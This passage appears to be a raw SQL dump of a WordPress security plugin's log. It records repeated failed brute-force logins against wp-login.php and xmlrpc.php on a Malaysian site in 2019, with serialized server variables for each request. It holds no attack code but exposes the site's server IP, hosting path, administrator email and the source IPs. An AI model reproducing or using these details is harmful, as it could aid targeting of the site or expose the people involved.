empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"192.241.190.85\";s:11:\"REMOTE_PORT\";s:5:\"43246\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHug1lvzIDnRn6zOHXjhgAAAJE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568796292.0921\";s:12:\"REQUEST_TIME\";s:10:\"1568796292\";}}','notice','2019-09-18 08:44:54','2019-09-18 08:44:52',17741952,19232320,'https://bintara.com.my/wp-login.php',1,0,'192.241.190.85'),(24989,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"192.241.190.85\";s:11:\"REMOTE_PORT\";s:5:\"43856\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHuh24SfF9g@8lNlxw9EgAAAFU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568796295.7284\";s:12:\"REQUEST_TIME\";s:10:\"1568796295\";}}','notice','2019-09-18 08:44:57','2019-09-18 08:44:56',18258552,19555664,'https://bintara.com.my/xmlrpc.php',1,0,'192.241.190.85'),(24990,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"185.80.92.123\";s:11:\"REMOTE_PORT\";s:5:\"49384\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHvcFlvzIDnRn6zOHXkcAAAAIs\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568796528.4303\";s:12:\"REQUEST_TIME\";s:10:\"1568796528\";}}','notice','2019-09-18 08:48:49','2019-09-18 08:48:48',17741512,19233272,'https://bintara.com.my/wp-login.php',1,0,'185.80.92.123'),(24991,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"185.80.92.123\";s:11:\"REMOTE_PORT\";s:5:\"50726\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHvc24SfF9g@8lNlxw9XgAAAFc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568796531.2923\";s:12:\"REQUEST_TIME\";s:10:\"1568796531\";}}','notice','2019-09-18 08:48:52','2019-09-18 08:48:51',18258064,19557128,'https://bintara.com.my/xmlrpc.php',1,0,'185.80.92.123'),(24992,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"82.165.155.140\";s:11:\"REMOTE_PORT\";s:5:\"52442\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHxF1lvzIDnRn6zOHXmFgAAAI0\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568796951.8762\";s:12:\"REQUEST_TIME\";s:10:\"1568796951\";}}','notice','2019-09-18 08:55:53','2019-09-18 08:55:52',17741392,19231720,'https://bintara.com.my/wp-login.php',1,0,'82.165.155.140'),(24993,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"82.165.155.140\";s:11:\"REMOTE_PORT\";s:5:\"52898\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHxG1lvzIDnRn6zOHXmIAAAAIw\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568796955.8047\";s:12:\"REQUEST_TIME\";s:10:\"1568796955\";}}','notice','2019-09-18 08:55:57','2019-09-18 08:55:56',18259488,19556440,'https://bintara.com.my/xmlrpc.php',1,0,'82.165.155.140'),(24994,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"178.128.90.9\";s:11:\"REMOTE_PORT\";s:5:\"55388\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHxsllvzIDnRn6zOHXm1QAAAII\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568797107.0385\";s:12:\"REQUEST_TIME\";s:10:\"1568797107\";}}','notice','2019-09-18 08:58:28','2019-09-18 08:58:27',17740968,19232024,'https://bintara.com.my/wp-login.php',1,0,'178.128.90.9'),(24995,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"178.128.90.9\";s:11:\"REMOTE_PORT\";s:5:\"56254\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHxullvzIDnRn6zOHXm4AAAAJE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568797114.2304\";s:12:\"REQUEST_TIME\";s:10:\"1568797114\";}}','notice','2019-09-18 08:58:35','2019-09-18 08:58:34',18258632,19555560,'https://bintara.com.my/xmlrpc.php',1,0,'178.128.90.9'),(24996,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"188.165.206.114\";s:11:\"REMOTE_PORT\";s:5:\"58250\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHyuFlvzIDnRn6zOHXn7gAAAIo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568797368.2684\";s:12:\"REQUEST_TIME\";s:10:\"1568797368\";}}','notice','2019-09-18 09:02:50','2019-09-18 09:02:48',17741120,19231936,'https://bintara.com.my/wp-login.php',1,0,'188.165.206.114'),(24997,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is 